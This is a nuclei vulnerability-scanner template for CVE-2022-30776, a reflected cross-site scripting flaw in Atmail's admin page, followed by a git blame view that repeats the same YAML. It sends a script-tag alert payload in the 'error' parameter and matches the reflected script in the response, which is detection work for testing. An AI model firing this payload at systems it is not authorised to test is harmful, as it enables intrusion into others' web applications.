nuclei-templates/cves/2022/CVE-2022-30776.yaml

id: CVE-2022-30776

info:
  name: Atmail Xss
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9

requests:
  - method: GET
    path:
     - "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('XSS')</script>"

      - type: word
        part: header
        words:
          - "text/html"
Update and rename CVE-2022-30777.yaml to CVE-2022-30776.yaml 2022-05-19 20:05:58 +00:00			`id: CVE-2022-30776`
Create CVE-2022-30777.yaml 2022-05-17 11:45:20 +00:00
			`info:`
			`name: Atmail Xss`
			`author: 3th1c_yuk1`
			`severity: medium`
			`reference:`
Update and rename CVE-2022-30777.yaml to CVE-2022-30776.yaml 2022-05-19 20:05:58 +00:00			`- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9`
Create CVE-2022-30777.yaml 2022-05-17 11:45:20 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"`

			`matchers-condition: and`
			`matchers:`

			`- type: word`
			`words:`
			`- "<script>alert('XSS')</script>"`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`